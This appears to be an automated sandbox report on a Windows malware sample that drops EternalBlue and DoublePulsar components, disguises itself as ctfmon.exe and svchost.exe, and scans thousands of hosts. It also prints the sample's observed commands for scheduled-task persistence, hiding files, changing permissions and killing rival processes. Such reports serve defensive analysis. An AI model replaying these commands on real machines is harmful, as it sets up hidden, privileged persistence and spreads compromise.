bbb1a707faaf2f9b06ee3da3bdbd511afae912a3bc2d845b49eb7ba4706fd282

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
Size

2.5MB
MD5

0692382a5ccf0b0b9406a434352bcd66
SHA1

d67f6d9f3353d712c13a96b00f87f4c9d511e26d
SHA256

44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a
SHA512

35d854e0e3cd237bbec6acb3fcbc0692b30333645fff0ed4320853e9c7c1caa6d9d12b0dc6a1c8515126d43695769d334a4a79b4cc1021ca33a7ddaab12805f6
SSDEEP

49152:5wTtKTyEJdyyUa6PrvMrKQHBhzFrBRucp2uBUYYs2aoywX7AqomhDHsH:5atKOMFkxQHBBZOtuBUg2aKXTJMH

Score

9^/10

discovery evasion upx

Malware Config

Signatures

Contacts a large (18058) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5976	attrib.exe
5992	attrib.exe
6008	attrib.exe
6024	attrib.exe
6040	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	ctfmon.exe

Deletes itself 1 IoCs

pid	Process
2404	xsfxdel~.exe

Executes dropped EXE 11 IoCs

pid	Process
2116	ctfmon.exe
2404	xsfxdel~.exe
2164	svchost.exe
3356	svchost.exe
552	svchost.exe
2460	svchost.exe
5112	svchost.exe
752	svchost.exe
1544	svchost.exe
3628	wget.exe
5032	taskhost.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023256-96.dat	upx
behavioral2/memory/3628-97-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3628-100-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Drops file in Windows directory 55 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\same.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Eter.xml	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\taskhost.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\cmd.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\cnli-1.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\loab.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Eter.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File opened for modification	C:\Windows\Fonts\Mysql\Eternalblue2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\file.txt	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\mance.xml	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\tufo-2.dll	ctfmon.exe
File opened for modification	C:\Windows\Fonts\Mysql\Result.txt	taskhost.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\dmgd-4.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue2.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\ucl.dll	ctfmon.exe
File opened for modification	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\coli-0.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\poab.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\ssleay32.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\bat.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\libxml2.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\p.txt	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\trch-1.dll	ctfmon.exe
File opened for modification	C:\Windows\Fonts\Mysql\Eternalblue.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\nei.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\tucl-1.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\libeay32.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\puls.xml	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\tibe-2.dll	ctfmon.exe
File opened for modification	C:\Windows\Fonts\Mysql\Doublepulsar.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\load.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\poad.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\posh-0.dll	ctfmon.exe
File opened for modification	C:\Windows\Fonts\Mysql\ctfmon.exe	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\ctfmon.exe	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\crli-0.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\zlib1.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\NansHou.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\puls.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\xdvl-0.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\wai.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\mance.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\svchost.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\tich-1.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\trfo-2.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\exma-1.dll	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\wget.exe	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\temp.txt	wget.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4300	sc.exe
3236	sc.exe
3140	sc.exe
3632	sc.exe
3668	sc.exe
1644	sc.exe
4976	sc.exe
4172	sc.exe
788	sc.exe
964	sc.exe
2276	sc.exe
1700	sc.exe
3108	sc.exe
4516	sc.exe
3636	sc.exe
2884	sc.exe
2204	sc.exe
2404	sc.exe
3468	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2084	schtasks.exe
3260	schtasks.exe

Kills process with WMI 15 IoCs

evasion

pid	Process
3036	WMIC.exe
1648	WMIC.exe
2780	WMIC.exe
5472	WMIC.exe
5940	WMIC.exe
456	WMIC.exe
3880	WMIC.exe
4000	WMIC.exe
5840	WMIC.exe
5904	WMIC.exe
4872	WMIC.exe
2464	WMIC.exe
4032	WMIC.exe
5872	WMIC.exe
2520	WMIC.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
3300	taskkill.exe
4560	taskkill.exe
4308	taskkill.exe
2736	taskkill.exe
1748	taskkill.exe
4216	taskkill.exe
1632	taskkill.exe
1444	taskkill.exe
3468	taskkill.exe
3748	taskkill.exe
4152	taskkill.exe
3796	taskkill.exe
1340	taskkill.exe
920	taskkill.exe
4768	taskkill.exe
3748	taskkill.exe
1260	taskkill.exe
3460	taskkill.exe
2468	taskkill.exe
3420	taskkill.exe
2732	taskkill.exe
4012	taskkill.exe
1452	taskkill.exe
2888	taskkill.exe
3572	taskkill.exe
5036	taskkill.exe
3496	taskkill.exe
3552	taskkill.exe
4736	taskkill.exe
2724	taskkill.exe
4076	taskkill.exe
4452	taskkill.exe
3944	taskkill.exe
1616	taskkill.exe
4144	taskkill.exe
4464	taskkill.exe
1184	taskkill.exe
4872	taskkill.exe
3364	taskkill.exe
3472	taskkill.exe
932	taskkill.exe
4016	taskkill.exe
1648	taskkill.exe
1996	taskkill.exe
4656	taskkill.exe
3420	taskkill.exe
2552	taskkill.exe
1004	taskkill.exe
2784	taskkill.exe
2056	taskkill.exe
3360	taskkill.exe
2284	taskkill.exe
3708	taskkill.exe
2052	taskkill.exe
2556	taskkill.exe
4976	taskkill.exe
4184	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
4772	PING.EXE
2008	PING.EXE
2808	PING.EXE
2388	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	4216	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	4464	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	2724	taskkill.exe
Token: SeDebugPrivilege	4560	taskkill.exe
Token: SeDebugPrivilege	3360	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	4016	taskkill.exe
Token: SeDebugPrivilege	1444	taskkill.exe
Token: SeDebugPrivilege	3468	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	4976	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	4076	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	3460	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	2732	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	3708	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	4656	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	3472	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	2556	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeSecurityPrivilege	4872	WMIC.exe
Token: SeTakeOwnershipPrivilege	4872	WMIC.exe
Token: SeLoadDriverPrivilege	4872	WMIC.exe
Token: SeSystemProfilePrivilege	4872	WMIC.exe
Token: SeSystemtimePrivilege	4872	WMIC.exe
Token: SeProfSingleProcessPrivilege	4872	WMIC.exe
Token: SeIncBasePriorityPrivilege	4872	WMIC.exe
Token: SeCreatePagefilePrivilege	4872	WMIC.exe
Token: SeBackupPrivilege	4872	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1340 wrote to memory of 2116	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	88
PID 1340 wrote to memory of 2116	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	88
PID 1340 wrote to memory of 2116	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	88
PID 2116 wrote to memory of 3228	2116	ctfmon.exe	103
PID 2116 wrote to memory of 3228	2116	ctfmon.exe	103
PID 2116 wrote to memory of 3228	2116	ctfmon.exe	103
PID 3228 wrote to memory of 1888	3228	cmd.exe	101
PID 3228 wrote to memory of 1888	3228	cmd.exe	101
PID 3228 wrote to memory of 1888	3228	cmd.exe	101
PID 1888 wrote to memory of 4908	1888	net.exe	100
PID 1888 wrote to memory of 4908	1888	net.exe	100
PID 1888 wrote to memory of 4908	1888	net.exe	100
PID 3228 wrote to memory of 4576	3228	cmd.exe	99
PID 3228 wrote to memory of 4576	3228	cmd.exe	99
PID 3228 wrote to memory of 4576	3228	cmd.exe	99
PID 4576 wrote to memory of 760	4576	net.exe	98
PID 4576 wrote to memory of 760	4576	net.exe	98
PID 4576 wrote to memory of 760	4576	net.exe	98
PID 1340 wrote to memory of 2404	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	89
PID 1340 wrote to memory of 2404	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	89
PID 1340 wrote to memory of 2404	1340	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	89
PID 3228 wrote to memory of 2164	3228	cmd.exe	97
PID 3228 wrote to memory of 2164	3228	cmd.exe	97
PID 3228 wrote to memory of 2164	3228	cmd.exe	97
PID 3228 wrote to memory of 3356	3228	cmd.exe	90
PID 3228 wrote to memory of 3356	3228	cmd.exe	90
PID 3228 wrote to memory of 3356	3228	cmd.exe	90
PID 3228 wrote to memory of 4300	3228	cmd.exe	96
PID 3228 wrote to memory of 4300	3228	cmd.exe	96
PID 3228 wrote to memory of 4300	3228	cmd.exe	96
PID 3228 wrote to memory of 2204	3228	cmd.exe	95
PID 3228 wrote to memory of 2204	3228	cmd.exe	95
PID 3228 wrote to memory of 2204	3228	cmd.exe	95
PID 3228 wrote to memory of 552	3228	cmd.exe	94
PID 3228 wrote to memory of 552	3228	cmd.exe	94
PID 3228 wrote to memory of 552	3228	cmd.exe	94
PID 3228 wrote to memory of 2460	3228	cmd.exe	91
PID 3228 wrote to memory of 2460	3228	cmd.exe	91
PID 3228 wrote to memory of 2460	3228	cmd.exe	91
PID 3228 wrote to memory of 5112	3228	cmd.exe	93
PID 3228 wrote to memory of 5112	3228	cmd.exe	93
PID 3228 wrote to memory of 5112	3228	cmd.exe	93
PID 3228 wrote to memory of 4772	3228	cmd.exe	92
PID 3228 wrote to memory of 4772	3228	cmd.exe	92
PID 3228 wrote to memory of 4772	3228	cmd.exe	92
PID 3228 wrote to memory of 752	3228	cmd.exe	111
PID 3228 wrote to memory of 752	3228	cmd.exe	111
PID 3228 wrote to memory of 752	3228	cmd.exe	111
PID 1544 wrote to memory of 2976	1544	svchost.exe	114
PID 1544 wrote to memory of 2976	1544	svchost.exe	114
PID 1544 wrote to memory of 2976	1544	svchost.exe	114
PID 2976 wrote to memory of 1112	2976	cmd.exe	115
PID 2976 wrote to memory of 1112	2976	cmd.exe	115
PID 2976 wrote to memory of 1112	2976	cmd.exe	115
PID 2976 wrote to memory of 1700	2976	cmd.exe	116
PID 2976 wrote to memory of 1700	2976	cmd.exe	116
PID 2976 wrote to memory of 1700	2976	cmd.exe	116
PID 2976 wrote to memory of 3236	2976	cmd.exe	117
PID 2976 wrote to memory of 3236	2976	cmd.exe	117
PID 2976 wrote to memory of 3236	2976	cmd.exe	117
PID 2976 wrote to memory of 3140	2976	cmd.exe	118
PID 2976 wrote to memory of 3140	2976	cmd.exe	118
PID 2976 wrote to memory of 3140	2976	cmd.exe	118
PID 2976 wrote to memory of 3108	2976	cmd.exe	119

Views/modifies file attributes 1 TTPs 11 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5992	attrib.exe
5984	attrib.exe
6000	attrib.exe
6016	attrib.exe
2316	attrib.exe
5976	attrib.exe
6024	attrib.exe
6040	attrib.exe
6032	attrib.exe
4264	attrib.exe
6008	attrib.exe

C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
"C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1340
- C:\Windows\Fonts\Mysql\ctfmon.exe
  "C:\Windows\Fonts\Mysql\ctfmon.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\Mysql\same.bat" "
    3⤵
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    PID:3228
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost start "MicrosoftMysql"
      4⤵
      Executes dropped EXE
      PID:752
  - - C:\Windows\SysWOW64\net.exe
      net start "MicrosoftMysql"
      4⤵
      PID:2276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "MicrosoftMysql"
        5⤵
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2552
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
      4⤵
      Creates scheduled task(s)
      PID:3260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4480
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
      4⤵
      Creates scheduled task(s)
      PID:2084
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s -r C:\windows\tasks\At*.job
      4⤵
      Views/modifies file attributes
      PID:4264
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s -r C:\Windows\System32\Tasks\At*
      4⤵
      Views/modifies file attributes
      PID:2316
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At1.job /c /e /t /g system:F
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At2.job /c /e /t /g system:F
      4⤵
      PID:552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:952
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At1.job /c /e /t /g everyone:F
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4076
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At2.job /c /e /t /g everyone:F
      4⤵
      PID:3036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2180
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g system:F
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:228
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At2 /c /e /t /g system:F
      4⤵
      PID:3460
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g everyone:F
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At2 /c /e /t /g everyone:F
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\MiscfostNsi /p system:n
      4⤵
      PID:3952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2828
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*ok* /p system:n
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1848
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*sa* /p system:n
      4⤵
      PID:3628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*Group* /p system:n
      4⤵
      PID:2392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*fost* /p system:n
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3864
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\WwANsvc /p system:n
      4⤵
      PID:4736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\HomeGroupProvider /p system:n
      4⤵
      PID:3552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*my* /p system:n
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1552
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\MiscfostNsi /p system:n
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1612
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\HomeGroupProvider /p system:n
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2400
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\WwANsvc /p system:n
      4⤵
      PID:4184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1312
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*fost* /p system:n
      4⤵
      PID:412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4288
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*Group* /p system:n
      4⤵
      PID:1264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*sa* /p system:n
      4⤵
      PID:5080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3236
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*ok* /p system:n
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5060
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*my* /p system:n
      4⤵
      PID:4052
  - - C:\Windows\SysWOW64\sc.exe
      sc start Schedule
      4⤵
      Launches sc.exe
      PID:3632
  - - C:\Windows\SysWOW64\net.exe
      net start Schedule
      4⤵
      PID:3472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Eternalblue-2.2.0.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Doublepulsar-1.3.1.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im one.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im z.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4560
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im c32.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3360
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im c64.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im service.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 32.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1444
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 64.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsazs.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome..exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4976
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Cstr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im srvany.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im CPUInfo.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3420
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im scvsots.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3748
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im acor.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmosee.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDHostServices.exe
      4⤵
